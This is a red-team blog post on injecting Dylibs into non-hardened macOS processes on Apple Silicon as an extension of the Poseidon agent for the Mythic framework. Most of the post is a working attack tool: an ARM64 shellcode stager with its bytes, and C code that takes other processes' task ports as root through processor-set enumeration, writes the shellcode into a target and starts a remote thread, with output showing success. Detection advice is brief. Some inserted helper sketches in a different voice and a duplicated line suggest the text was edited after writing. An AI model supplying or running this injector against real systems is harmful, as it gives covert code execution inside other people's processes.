ARM-ed and Dangerous: Dylib Injection on macOS

Aug 21 2025

By: West Shepherd • 24 min read

Modern Dylib Injection Techniques for AArch64 macOS

TL;DR This post details how I extended the Mythic Poseidon agent to support ARM64 Dylib injection on Apple Silicon. The method leverages Mach APIs to enumerate processor sets, obtain task ports, and inject ARM64 shellcode that loads dynamic libraries (i.e., Dylibs) into non-hardened macOS processes. Full technical details are provided, including shellcode construction, memory allocation, runtime patching, and thread creation. Readers will gain insight into working around task_for_pid() restrictions with processor set enumeration and how defenders can detect these techniques in the wild.

Introduction

Modern macOS security controls have significantly raised the bar for process injection. Features like System Integrity Protection (SIP), Hardened Runtime, and Pointer Authentication Codes (PAC) enforce restrictions that block most familiar techniques. These defenses make it nearly impossible to inject into hardened applications, yet one method remains effective for certain non-hardened targets. Dylib injection using Mach ports still offers a practical approach under specific conditions.

In this post, I share how I extended the Poseidon agent for Mythic to support Dylib injection on Apple Silicon. The original macOS agent only included Dylib injection for Intel (AMD64) platforms. To achieve parity on AArch64, I reimplemented the same injection logic and wrote a shellcode stager in ARM64 assembly. This post walks through the technical details, from the relevant Mach APIs to each step of the injection process.

The Dylib Injection Technique

Before diving into the specifics of ARM64 support, it is important to revisit the core concept of Dylib injection. This technique enables dynamic modification of a running process by loading an external shared library into its memory space.

The injection process involves three primary steps: allocating memory within the target process, writing shellcode that carries out the actual loading of the Dylib, and creating a new thread to run that shellcode. While these steps mirror Poseidon's AMD64 implementation, adding ARM64 support introduced new challenges, particularly around architectural differences and calling conventions.

With this foundation established, we can now examine the Mach primitives that make this possible on macOS.

Understanding the Mach Context

The Mach kernel forms the backbone of macOS process management. It provides abstractions like tasks and ports that enable inter-process communication and memory manipulation. A task represents the kernel-level execution environment of a process, and ports are kernel-managed communication channels for exchanging messages.

To perform Dylib injection, we need access to the target task’s port. The task_for_pid() API was historically the go-to solution for obtaining this access. However, SIP now enforces strict limitations, allowing its use only by processes with specific entitlements and Apple signatures.

Instead, we leverage a less common approach. By using host-level privileges, we can enumerate processor sets and retrieve task ports indirectly. This method avoids SIP’s direct enforcement while enabling the use of functions like mach_vm_write() and thread_create_running() later in the injection process.

Having outlined the necessary Mach context, the next step is to prepare a suitable environment for building and testing the injection logic.

Environment and Setup

If you already have an environment set up, feel free to skip to the next section.

Developing and testing this injection technique requires a controlled environment. For this walkthrough, I used a Mac mini running macOS 15 (Sequoia). SIP was enabled to simulate realistic conditions, and Gatekeeper was temporarily disabled to allow testing of unsigned binaries. However, Gatekeeper will allow ad-hoc signed binaries to run if they are signed locally on the macOS system, which is a safer alternative to disabling Gatekeeper entirely (e.g., codesign -f -s - ./binary).

The setup also requires Xcode, along with Homebrew's binutils and coreutils packages. Root access is required to perform operations such as memory allocation and thread creation in a remote process.

With the environment ready, we can move on to creating a test Dylib that serves as the payload for injection.

Creating the Test Dylib

The test Dylib provides a simple way to confirm successful injection. Its purpose is to perform an observable action upon loading, verifying that the injection worked as intended. The following code defines inject_dylib.c.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <mach/mach.h>

__attribute__((constructor))
void injected() {
    printf("[+] Successfully injected into process! PID: %d\n", getpid());
    system("touch /tmp/injected_success");  // Create a file to confirm execution
}

Compile the Dylib using the following clang command.

admin@[libinject]> clang -shared \
  -o inject_dylib.dylib inject_dylib.c \
  -framework Foundation \
  -arch arm64 -fPIC
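The constructor attribute is what turns a successful dlopen() into code execution: dyld runs every function marked __attribute__((constructor)) when the image is loaded, before dlopen() returns. The same rule applies to a main executable, where constructors run before main(), so the ordering is easy to observe without injecting anything. This is a portable sketch (Clang or GCC); constructor_ran, mark_loaded(), and constructor_has_run() are hypothetical names.

```c
/* Hypothetical flag recording that the constructor ran. */
static int constructor_ran = 0;

/* Runs when the image containing it is loaded: before main() for an
   executable, during dlopen() for a Dylib. */
__attribute__((constructor))
static void mark_loaded(void)
{
    constructor_ran = 1;
}

/* Returns 1 if the constructor had already executed when this is called. */
static int constructor_has_run(void)
{
    return constructor_ran;
}
```

Any code reached from main() will see constructor_has_run() return 1, because the constructor has already fired by then.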

With the Dylib compiled, we need a target process for testing the injection.

Creating a Persistent Test Process

To simplify testing, we will create a lightweight program, inject_target.c, that runs indefinitely, making it an ideal target for demonstrating injection.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    printf("[+] Test process started. PID: %d\n", getpid());
    while (1) {
        sleep(1);  // Keep the process running
    }
    printf("[+] Done sleeping, exiting process\n");
    return 0;
}

Next, compile the test application.

admin@[libinject]> clang -o inject_target inject_target.c
admin@[libinject]> file inject_target

inject_target: Mach-O 64-bit executable arm64
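dlopen() refuses a Dylib whose architecture does not match the loading process, so it is worth confirming that both artifacts are arm64, as file does above. That check comes from the first eight bytes of the Mach-O header (the magic and cputype fields). The sketch below repeats it in C. The helper names are hypothetical, the constants are copied from <mach-o/loader.h> and <mach/machine.h> so the code also builds off macOS, and universal (fat) binaries are deliberately not handled.

```c
#include <stdint.h>
#include <stdio.h>

/* Values mirror MH_MAGIC_64 and CPU_TYPE_ARM64 from the macOS headers. */
#define SKETCH_MH_MAGIC_64    0xfeedfacfu
#define SKETCH_CPU_TYPE_ARM64 0x0100000cu  /* CPU_TYPE_ARM | CPU_ARCH_ABI64 */

/* Reads a little-endian 32-bit value from a byte buffer. */
static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 if `hdr` starts with a thin 64-bit arm64 Mach-O header. */
static int is_thin_arm64_macho(const unsigned char *hdr, size_t len)
{
    if (len < 8)
        return 0;
    return read_le32(hdr) == SKETCH_MH_MAGIC_64 &&
           read_le32(hdr + 4) == SKETCH_CPU_TYPE_ARM64;
}

/* Convenience wrapper for a file on disk, e.g. inject_dylib.dylib. */
static int file_is_thin_arm64(const char *path)
{
    unsigned char hdr[8];
    FILE *f = fopen(path, "rb");
    if (!f)
        return 0;
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return is_thin_arm64_macho(hdr, n);
}
```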

With both the test Dylib and target process prepared, we can now explore the ARM64 shellcode that performs the actual injection.

ARM64 Shellcode

This shellcode replicates Poseidon’s AMD64 functionality for Apple Silicon. It carries out three operations entirely in memory: spawning a new thread, loading the Dylib, and terminating the thread.

The shellcode was written in ARM64 assembly to account for architectural differences such as register usage and calling conventions. Let’s break it down step by step.

Shellcode Breakdown

The ARM64 shellcode begins with a prologue that prepares the stack and preserves critical registers. This setup ensures that subsequent operations maintain proper alignment and do not disrupt the calling conventions of the target process.

.global _main
.align 2
.text

_main:
    ; === Prologue ===
    ; Allocate 32 bytes on the stack to store local variables and maintain alignment
    sub sp, sp, #32
    ; Save frame pointer (x29) and link register (x30) to stack at offset 16
    stp x29, x30, [sp, #16]
    ; Set x29 (frame pointer) to the new stack position for stack frame tracking
    add x29, sp, #16

Thread Creation

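After setting up the stack, the shellcode prepares arguments for pthread_create_from_mach_thread(). The thread the injector creates with thread_create_running() is a bare Mach thread with no pthread state, so it cannot safely call most libc functions, including dlopen(). pthread_create_from_mach_thread() exists for this case: it creates a fully initialized pthread within the target process, and that thread executes a secondary routine called _start_routine.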

; === Prepare Arguments for pthread_create_from_mach_thread ===
; int pthread_create_from_mach_thread(
;     pthread_t *thread,             // x0 (SP pointer to thread)
;     const pthread_attr_t *attr,    // x1 (NULL pointer to thread attributes)
;     void *(*start_routine)(void*), // x2 (Pointer to _start_routine)
;     void *arg                      // x3 (NULL pointer to start_routine data)
; );

; Set x0 to point to the stack (thread reference pointer)
mov x0, sp                      
; Set x1 to zero (NULL pointer for pthread attributes)
mov x1, xzr                     
; Load address of the new thread's start_routine function 
adr x2, _start_routine          
; Set x3 to zero (NULL pointer, no arguments passed to _start_routine)
mov x3, xzr                     
; Load function address of pthread_create_from_mach_thread into x4
ldr x4, _pthread_create_from_mach_thread 
; Call pthread_create_from_mach_thread(), which creates a new thread
blr x4

After creating the thread, the shellcode enters an infinite loop. The bootstrap Mach thread has no valid caller to return to, so spinning in place keeps it from crashing the target while the new pthread executes independently.

_jump:
    ; === Infinite Loop to Prevent Returning to Caller ===
    ; The bootstrap Mach thread has no valid return address.
    ; Spin here forever while the new pthread does the real work.
    b _jump

The _start_routine function carries out the actual work of loading the Dylib. It calls dlopen() to load the specified library, then terminates cleanly using pthread_exit().

_start_routine:
    ; === Start Routine: Load and Execute Dylib ===
    ; This function runs in the new thread and loads a dynamic library.

    ; void *dlopen(
    ;     const char *filename,     // x0 (Pointer to library path)
    ;     int flag                  // x1 (Loading flags RTLD_LAZY (1))
    ; );

    ; Load address of _dylib string (path to the library) into x0
    adr x0, _dylib                 
    ; Set x1 to 1 (RTLD_LAZY flag for dlopen)
    mov x1, #1                     
    ; Load function address of dlopen into x7
    ldr x7, _dlopen                
    ; Call dlopen(), loading the specified dylib into memory
    blr x7                          

    ; === Call pthread_exit to Terminate the Thread ===
    ; void pthread_exit(void *retval);
    
    ; Load function address of pthread_exit into x8
    ldr x8, _pthread_exit              
    ; Set x0 to 0 (exit code)
    movz x0, #0                         
    ; Call pthread_exit(), terminating the thread
    blr x8

To support dynamic behavior, we append a small data area to the end of the shellcode that holds the placeholders PTHRDCRT, DLOPEN__, PTHREXIT, and LIBLIBLIB. The injector patches these at runtime with the resolved function addresses and the actual Dylib path.

; === Data Section ===
; These labels hold function addresses and the path to the library being injected.

; Placeholder for address of pthread_create_from_mach_thread
_pthread_create_from_mach_thread: .ascii  "PTHRDCRT"
; Placeholder for address of dlopen
_dlopen:                          .ascii  "DLOPEN__"
; Placeholder for address of pthread_exit
_pthread_exit:                    .ascii  "PTHREXIT"
; Library path placeholder
_dylib:                           .ascii  "LIBLIBLIB\0\...[62 null bytes]...\0"

With the shellcode logic understood, we can now examine how it is compiled and integrated into the injection process.

Generating Shellcode Bytes

After authoring the shellcode, it must be compiled and converted into a format that the injection code can use. The following commands assemble the shellcode, link it into a binary, extract raw bytes, and format them as a C-compatible array.

admin@[libinject]> as -arch arm64 shellcode.asm -o shellcode.o && \
  ld -o shellcode shellcode.o && \
  objcopy -O binary shellcode shellcode.bin && \
  hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin > shellcode.txt

This process produces a flat text file of hexadecimal opcodes. These opcodes are imported into the C code as a static template called shellcode_template.
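The final hexdump stage prints each byte as a \xNN escape so the output can be pasted into a C string literal. A rough C equivalent is sketched below, assuming the raw bytes are already in memory. bytes_to_c_escapes() is a hypothetical helper, not part of the original toolchain.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper mirroring the hexdump step: render `len` raw bytes as
   the body of a C string literal, e.g. {0xff, 0x83} -> \xff\x83.
   Returns a heap string the caller must free, or NULL on allocation failure. */
static char *bytes_to_c_escapes(const unsigned char *bytes, size_t len)
{
    static const char digits[] = "0123456789abcdef";
    char *out = malloc(len * 4 + 1);   /* 4 characters per byte plus NUL */
    if (!out)
        return NULL;
    char *p = out;
    for (size_t i = 0; i < len; i++) {
        memcpy(p, "\\x", 2);           /* a literal backslash followed by 'x' */
        p[2] = digits[bytes[i] >> 4];
        p[3] = digits[bytes[i] & 0x0f];
        p += 4;
    }
    *p = '\0';
    return out;
}
```

For the first instruction of _main, the bytes ff 83 00 d1 render as \xff\x83\x00\xd1, matching the first line of shellcode_template.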

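By copying and patching the template for each injection, we avoid reusing modified shellcode. Patching the template in place would overwrite its placeholders, so a second injection from the same process would find nothing to patch and would silently reuse the previous addresses and path.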
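To make the reuse problem concrete, the sketch below patches a heap copy and leaves the template untouched, then shows that a second pass over an already-patched buffer finds nothing to replace. patch_u64() and patched_copy() are hypothetical helpers, not functions from the Poseidon source. Values are written in native byte order, which matches what ldr expects because both injector and target are arm64.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: overwrite every 8-byte `marker` in buf with `value`.
   Returns how many markers were replaced. */
static int patch_u64(unsigned char *buf, size_t len, const char *marker,
                     uint64_t value)
{
    assert(strlen(marker) == 8);
    int hits = 0;
    for (size_t off = 0; off + 8 <= len; off++) {
        if (memcmp(buf + off, marker, 8) == 0) {
            memcpy(buf + off, &value, sizeof value);
            hits++;
            off += 7;  /* resume scanning after the bytes just written */
        }
    }
    return hits;
}

/* Copy-then-patch: the template keeps its markers for the next injection. */
static unsigned char *patched_copy(const unsigned char *tmpl, size_t len,
                                   const char *marker, uint64_t value)
{
    unsigned char *copy = malloc(len);
    if (!copy)
        return NULL;
    memcpy(copy, tmpl, len);
    patch_u64(copy, len, marker, value);
    return copy;
}
```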

Implementing the Shellcode in C

The final product is the C shellcode array shellcode_template, which serves as a base for the injection payload. It contains the compiled ARM64 opcodes, along with placeholder strings for function pointers and the Dylib path.

char shellcode_template[] =
  //0000000100003f00 <_main>:
  "\xff\x83\x00\xd1"  // sub     sp, sp, #0x20
  "\xfd\x7b\x01\xa9"  // stp     x29, x30, [sp, #0x10]
  "\xfd\x43\x00\x91"  // add     x29, sp, #0x10
  "\xe0\x03\x00\x91"  // mov     x0, sp (pthread_t *thread)
  "\xe1\x03\x1f\xaa"  // mov     x1, xzr (const pthread_attr_t *attr)
  "\xa2\x00\x00\x10"  // adr     x2, _start_routine (void *(*start_routine)(void*))
  "\xe3\x03\x1f\xaa"  // mov     x3, xzr (void *arg)
  "\x44\x01\x00\x58"  // ldr     x4, _pthread_create_from_mach_thread
  "\x80\x00\x3f\xd6"  // blr     x4 (call pthread_create_from_mach_thread())
  //0000000100003f24 <_jump>:
  "\x00\x00\x00\x14"  // b       _jump (branch to self)
  //0000000100003f28 <_start_routine>:
  "\xa0\x01\x00\x10"  // adr     x0, _dylib (const char *filename)
  "\x21\x00\x80\xd2"  // mov     x1, #0x1 (int flag (RTLD_LAZY))
  "\xe7\x00\x00\x58"  // ldr     x7, _dlopen
  "\xe0\x00\x3f\xd6"  // blr     x7 (call dlopen())
  "\xe8\x00\x00\x58"  // ldr     x8, _pthread_exit
  "\x00\x00\x80\xd2"  // mov     x0, #0x0 (void *retval)
  "\x00\x01\x3f\xd6"  // blr     x8  (call pthread_exit())
  //0000000100003f44 <_pthread_create_from_mach_thread>:
  "PTHRDCRT"          // _pthread_create_from_mach_thread  (offset 0x44)
  "DLOPEN__"          // _dlopen                           (offset 0x4c)
  "PTHREXIT"          // _pthread_exit                     (offset 0x54)
  "LIBLIBLIB"         // _dylib path buffer                (offset 0x5c)
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00";

At runtime, the injector searches a local copy of this template for the placeholders and replaces them with the actual addresses and the Dylib path before writing the result into the target process. This ensures the shellcode operates correctly within the target process.
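The adr and ldr instructions in the template reach _start_routine, the three pointer slots, and the path buffer relative to the program counter, which is why the patcher may overwrite the bytes of each slot but must never move them. Recomputing the encodings is a cheap way to check that the annotated bytes agree with the layout (code at offsets 0x00 to 0x43, pointer slots at 0x44, 0x4c, and 0x54, path at 0x5c). The encoder functions below are hypothetical helpers written from the A64 ADR and LDR (literal) instruction formats.

```c
#include <assert.h>
#include <stdint.h>

/* ADR Xd, label: Rd = PC + offset, range +/-1 MiB, byte granularity.
   Layout: immlo (2 bits) at [30:29], 0b10000 at [28:24], immhi (19 bits) at [23:5], Rd. */
static uint32_t encode_adr(unsigned rd, int32_t offset)
{
    assert(rd < 32 && offset >= -(1 << 20) && offset < (1 << 20));
    uint32_t imm = (uint32_t)offset & 0x1fffff;        /* 21-bit two's complement */
    return 0x10000000u | ((imm & 0x3) << 29) | ((imm >> 2) << 5) | rd;
}

/* LDR Xt, label: loads 8 bytes from PC + offset; offset is a multiple of 4. */
static uint32_t encode_ldr_literal_x(unsigned rt, int32_t offset)
{
    assert(rt < 32 && offset % 4 == 0);
    assert(offset >= -(1 << 20) && offset < (1 << 20));
    uint32_t imm19 = ((uint32_t)offset >> 2) & 0x7ffff;
    return 0x58000000u | (imm19 << 5) | rt;
}
```

For example, the ldr x4 at offset 0x1c reaches the PTHRDCRT slot at 0x44, a distance of 0x28 bytes, which encodes as 0x58000144 and is stored little-endian as \x44\x01\x00\x58.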

Having covered the shellcode implementation, we can now shift focus to the injection process itself.

Dylib Injection Exploit Code

Replicating Task for PID

The injection routine (libinject_darwin_arm64.c) begins with the challenge of obtaining a task port for the target process. Since SIP blocks task_for_pid() unless the binary has Apple entitlements, the injector uses a custom task_for_pid_wrapper() function. This function takes an indirect approach, relying on processor set enumeration and host-level privileges to retrieve task ports.

Obtaining the Host Privileged Port

The first step is to retrieve the host privileged port using host_get_host_priv_port(). This port is required for advanced Mach-based system queries and is only available to processes running as root or signed with specific entitlements, such as com.apple.private.kernel.system-task-access, com.apple.private.mach-priv, or com.apple.system-task-ports.

host_t host_priv;
host_get_host_priv_port(mach_host_self(), &host_priv);

Getting the Default Processor Set

Processor sets are kernel objects that group CPUs and their associated tasks. Once the host privileged port is available, the injector calls processor_set_default() to obtain a handle to the system’s default processor set.

mach_port_t ps_default;
kern_return_t kr;
kr = processor_set_default(host_priv, &ps_default);

Enumerating Processor Sets

The injector then uses host_processor_sets() to retrieve a list of all processor sets on the system. This enumeration provides entry points for later task enumeration.

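// host_processor_sets() allocates the array itself (MIG out-of-line memory);
// release it with vm_deallocate() once it is no longer needed
processor_set_name_array_t psets;
mach_msg_type_number_t pset_count;
kr = host_processor_sets(host_priv, &psets, &pset_count);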

Obtaining Privileges Over the Processor Set

To enumerate the tasks within a processor set, the injector calls host_processor_set_priv() to request control access to the default processor set. This step is critical because it enables the use of processor_set_tasks().

mach_port_t ps_default_control;
kr = host_processor_set_priv(host_priv, ps_default, &ps_default_control);
if (kr != KERN_SUCCESS) {
    display_error("Failed to set privileges with host_processor_set_priv", kr);
    mach_error("host_processor_set_priv", kr);
    return 0;
}

Retrieving All Task Ports

With control access granted, the injector uses processor_set_tasks() to obtain an array of task ports for all processes in the system. Unlike task_for_pid(), this method is not subject to SIP’s direct enforcement.

mach_msg_type_number_t num_tasks;
task_array_t tasks;
num_tasks = 1000;
kr = processor_set_tasks(ps_default_control, &tasks, &num_tasks);
if (kr != KERN_SUCCESS) {
    display_error("Failed to set tasks with processor_set_tasks", kr);
    return 0;
}

The tasks array now contains task ports for every process.

Matching the Target Process

The injector iterates over the retrieved task ports and uses pid_for_task() to compare each task’s PID to the target PID. When a match is found, the corresponding task port is returned.

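for (mach_msg_type_number_t i = 0; i < num_tasks; i++) {
    int target_pid = -1;
    // Skip ports the kernel refuses to resolve to a PID
    if (pid_for_task(tasks[i], &target_pid) != KERN_SUCCESS) {
        continue;
    }
    if (target_pid == pid) {
        printf("[+] Got task=%u for pid=%d\n", tasks[i], pid);
        return tasks[i];
    }
}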

This sequence effectively replicates the functionality of task_for_pid() without requiring Apple’s entitlements.

Why This Approach Works Despite SIP

Although SIP blocks task_for_pid() for protected processes, it does not impose equivalent restrictions on querying processor sets. By first obtaining host privileges, the injector accesses a more permissive control path to enumerate tasks and identify the one associated with the target PID.

This method does not bypass SIP entirely. Instead, it exploits the fact that processor set APIs remain exposed to processes running as root.

Mach-O Manipulation

With the task port for the target process secured, the next phase focuses on preparing the memory space for the injection payload. This involves allocating memory regions within the target process, configuring them appropriately, and writing the ARM64 shellcode. Proper alignment and protection settings are critical here to avoid crashing the target or triggering security mechanisms.

Allocating Memory in the Target Process

Once the target task port is obtained, the injector allocates memory in the remote process. Two regions are allocated: one for the shellcode and one for the thread’s stack. Both allocations use mach_vm_allocate() with the VM_FLAGS_ANYWHERE flag, allowing the kernel to select suitable addresses.

mach_vm_address_t remote_stack = 0;
mach_vm_address_t remote_code = 0;

kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  display_error("Failed to allocate space", kr);
  return -2;
}
printf("[+] Stack allocated at address: 0x%llx\n", remote_stack);

// Allocate the remote code region
kr = mach_vm_allocate(remote_task, &remote_code, CODE_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  display_error("Failed to allocate code memory", kr);
  return -2;
}
printf("[+] Code allocated at address: 0x%llx\n", remote_code);

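The stack region is sized at STACK_SIZE (0x4000 bytes, or 16 KiB), which is sufficient for the minimal work the bootstrap thread performs: it only needs enough stack to call pthread_create_from_mach_thread(), and the pthread it creates receives its own stack from libpthread.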
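The injector later points the bootstrap thread's stack pointer at the middle of this region (remote_stack += STACK_SIZE / 2). The AArch64 procedure call standard (AAPCS64) requires SP to stay 16-byte aligned, so any other starting point should be rounded down accordingly. The hypothetical helper below computes such a starting SP. With the base address from the sample run later in this post (0x1025c0000) and a 0x4000-byte region, the midpoint is 0x1025c2000.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: initial SP at `offset` bytes above `base` inside a
   region of `size` bytes. The stack grows downward from this point, and the
   result is rounded down to a 16-byte boundary as AAPCS64 requires. */
static uint64_t initial_sp(uint64_t base, uint64_t size, uint64_t offset)
{
    assert(offset <= size);
    return (base + offset) & ~(uint64_t)0xf;
}
```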

Resolving Function Addresses

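The injector resolves the addresses of pthread_create_from_mach_thread(), dlopen(), and pthread_exit() at runtime in its own process. These addresses remain valid in the target because all three functions live in the dyld shared cache, which ordinary processes of the same architecture map at the same slide until the next reboot. The resolved pointers are later used to patch the placeholders in the shellcode template.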

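uint64_t addr_of_pthread = (uint64_t)dlsym(
  RTLD_DEFAULT,
  "pthread_create_from_mach_thread"
);
uint64_t addr_of_pexit = (uint64_t)dlsym(
  RTLD_DEFAULT,
  "pthread_exit"
);
uint64_t addr_of_dlopen = (uint64_t)dlopen;
if (!addr_of_pthread || !addr_of_pexit || !addr_of_dlopen) {
  fprintf(stderr, "[-] Failed to resolve a required function\n");
  return -1;
}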

If any of these lookups fail, the injector aborts to avoid corrupting the remote process with invalid addresses.

Patching the Shellcode Template

With function addresses resolved, the injector allocates a fresh copy of the shellcode_template array, then searches for placeholders within the array. Each placeholder is replaced with the corresponding function pointer or the full path to the target Dylib.

size_t shellcode_size = sizeof(shellcode_template);
char *shellcode = malloc(shellcode_size);
if (!shellcode) {
    perror("[-] Failed to allocate memory for shellcode");
    return -1;
}
memcpy(shellcode, shellcode_template, shellcode_size);
printf("[+] Patching shellcode\n");
// Scan only offsets where an 8-byte placeholder still fits inside the buffer
for (size_t off = 0; off + 8 <= shellcode_size; off++) {
  char *possible_patch_location = shellcode + off;
  if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
    memcpy(possible_patch_location, &addr_of_pthread, sizeof(uint64_t));
    printf("[+] Patched pthread_create_from_mach_thread() with address: 0x%llx\n", addr_of_pthread);
  } else if (memcmp(possible_patch_location, "PTHREXIT", 8) == 0) {
    memcpy(possible_patch_location, &addr_of_pexit, sizeof(uint64_t));
    printf("[+] Patched pthread_exit() with address: 0x%llx\n", addr_of_pexit);
  } else if (memcmp(possible_patch_location, "DLOPEN__", 8) == 0) {
    memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
    printf("[+] Patched dlopen() with address: 0x%llx\n", addr_of_dlopen);
  } else if (off + 9 <= shellcode_size &&
             memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
    // The path buffer runs from here to the end of the template, NUL included
    if (strlen(lib) + 1 > shellcode_size - off) {
      fprintf(stderr, "[-] Dylib path is too long for the shellcode buffer\n");
      free(shellcode);
      return -1;
    }
    strcpy(possible_patch_location, lib);
    printf("[+] Patched library with path: %s\n", lib);
    break;  // the path is the last placeholder in the template
  }
}
printf("[+] Shellcode patched\n");
printf("[+] Shellcode patched\n");

This dynamic patching ensures that the shellcode has accurate references for the current process and Dylib being injected.

Writing the Shellcode to the Target Process

After patching, the injector writes the modified shellcode into the allocated memory region of the target process using mach_vm_write().

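printf("[+] Writing shellcode to memory\n");
// Write only the bytes of the patched copy, not CODE_SIZE bytes from a smaller heap buffer
kr = mach_vm_write(remote_task, remote_code, (vm_offset_t)shellcode,
                   (mach_msg_type_number_t)shellcode_size);
free(shellcode);  // the local copy is no longer needed
if (kr != KERN_SUCCESS) {
  display_error("Failed to write shellcode", kr);
  return -3;
}
printf("[+] Shellcode written to address: 0x%llx\n", remote_code);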

Set Memory Protections for Execution and Stack Use

To prepare the shellcode for execution, the injector then updates the memory protections of both regions: the code region is marked read and execute (RX), while the stack region is set to read and write (RW).

printf("[+] Setting code region to RX permissions\n");
kr = vm_protect(
  remote_task,
  remote_code,
  CODE_SIZE,
  FALSE,
  VM_PROT_READ | VM_PROT_EXECUTE
);
if (kr != KERN_SUCCESS) {
  display_error("Failed to set code RX", kr);
  return -4;
}

printf("[+] Setting stack region to RW permissions\n");
kr = vm_protect(
  remote_task,
  remote_stack,
  STACK_SIZE,
  TRUE,
  VM_PROT_READ | VM_PROT_WRITE
);
if (kr != KERN_SUCCESS) {
  display_error("Failed to set stack RW", kr);
  return -4;
}

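These protections matter because Apple Silicon does not allow a page to be writable and executable at the same time (W^X), so the code region must be switched from RW to RX once the shellcode has been written. Hardened processes go further and block execution of unsigned memory, which is one reason this technique is limited to non-hardened targets.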

Launching the Remote Thread

The final step involves creating a new thread in the target process that begins execution at the shellcode entry point. This is done using thread_create_running().

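printf("[i] Setting remote registers\n");
remote_stack += (STACK_SIZE / 2);  // SP starts mid-region; the stack grows down
arm_thread_state64_t state;
memset(&state, 0, sizeof(state));  // zero every register not set explicitly
state.__pc = (uintptr_t)remote_code;
state.__sp = (uintptr_t)remote_stack;
state.__fp = (uintptr_t)remote_stack;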
printf("[+] Spawning thread\n");
thread_act_t thread;
kr = thread_create_running(
   remote_task,
   ARM_THREAD_STATE64,
   (thread_state_t)&state,
   ARM_THREAD_STATE64_COUNT,
   &thread
);
if (kr != KERN_SUCCESS) {
  display_error("Failed to spawn thread", kr);
  return -3;
}
printf("[+] Finished injecting into pid=%d with dylib=%s\n", pid, lib);
return 0;

At this point, the new thread is active within the target process and executes the ARM64 shellcode, which spawns another thread to load the Dylib.

Payload Execution

With the injection routine in place, the next step is to test it against the persistent test process. Start by launching the target application in the background. This process will run indefinitely, waiting for the injection to occur.

admin@[libinject]> ./inject_target &
[4] 79530
admin@[libinject]> [+] Test process started. PID: 79530

Once the target process is running, compile the injector and then run it as root, passing the process ID (PID) of the target application and the full path to the test Dylib.

The injector will display status messages as it progresses through key stages such as task port acquisition, memory allocation, shellcode patching, and thread creation.

admin@[libinject]> clang libinject_darwin_arm64.c -framework Foundation \
-o libinject_darwin_arm64 -arch arm64 -framework Security

admin@[libinject]> sudo ./libinject_darwin_arm64 $(pgrep inject_target) /tmp/inject_dylib.dylib

[+] Running libinject_darwin_arm64
[+] Got task=8195 for pid=79530
[+] Stack allocated at address: 0x1025c0000
[+] Code allocated at address: 0x1025d0000
[+] Patching shellcode
[+] Patched pthread_create_from_mach_thread() with address: 0x187d39b28
[+] Patched dlopen() with address: 0x187d404f4
[+] Patched pthread_exit() with address: 0x187d35954
[+] Patched library with path: /tmp/inject_dylib.dylib
[+] Shellcode patched
[+] Writing shellcode to memory
[+] Shellcode written to address: 0x1025d0000
[+] Setting code region to RX permissions
[+] Setting stack region to RW permissions
[i] Setting remote registers
[+] Spawning thread
[+] Finished injecting into pid=79530 with dylib=/tmp/inject_dylib.dylib
[+] Injection successful!

admin@[libinject]>
[+] Successfully injected into process! PID: 79530

After the injection completes, confirm that the test Dylib executed successfully by checking for the artifact its constructor created.

admin@[libinject]> ls /tmp/injected_success
/tmp/injected_success

If the file exists, it confirms that the Dylib was loaded into the target process and executed as intended.

Detection

Although this injection technique avoids using task_for_pid() and does not leave shellcode binaries on disk, it is not fully stealthy. The injected Dylib must exist on disk for dlopen() to load it. This requirement creates opportunities for defenders to detect unauthorized activity.

Apple’s Hardened Runtime and SIP protections already block unsigned Dylibs from loading into hardened processes. Ensuring these defenses are enabled, along with enforcing strict code signing policies, provides strong mitigation against this technique.

Conclusion

ARM64 Dylib injection on macOS demonstrates both the power of Mach APIs and the persistent challenges of securing dynamic operating systems. Apple's ongoing improvements to SIP and code signing have raised the bar for attackers, but non-hardened applications remain exposed.

For red team operators, this technique provides a practical method of gaining code execution on non-hardened targets in Apple Silicon environments. For defenders, understanding the mechanics of this injection process is essential to detecting and mitigating similar threats in the wild.

Shout Out

Special thanks to Angelo DeLuca and Erhad Husovic from NSoft for their excellent work on the ReverseApple project, which provided valuable insight into ARM64 injection techniques. Additional credit goes to Leo Pitt for the blog post “Dylib Loads that Tickle Your Fancy,” to Cody Thomas, and to Chris Ross for his foundational work on the Poseidon agent. Their contributions helped shape the direction of this research.

References / Resources

L. Pitt, “Dylib Loads That Tickle your Fancy,” SpecterOps, Aug. 2022. [Online]. Available: https://posts.specterops.io/dylib-loads-that-tickle-your-fancy-d25196addd8c
Apple Inc., “Apple Developer Documentation.” [Online]. Available: https://developer.apple.com/documentation/
Apple Inc., “Mach-O Programming Guide.” [Online]. Available: https://developer.apple.com/library/archive/documentation/
W. Shepherd, “libinject_darwin_arm64.c,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/f792cac61a1b51d3d96ade6a917819ff
W. Shepherd, “libinject_darwin_arm64.h,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/cfcb9ecf7f9e2aa96e5884a0526ccba7
Mythic – Poseidon Agent on AMD64 macOS, SpecterOps. [Online]. Available: https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agent_code/libinject/libinject_darwin_amd64.c
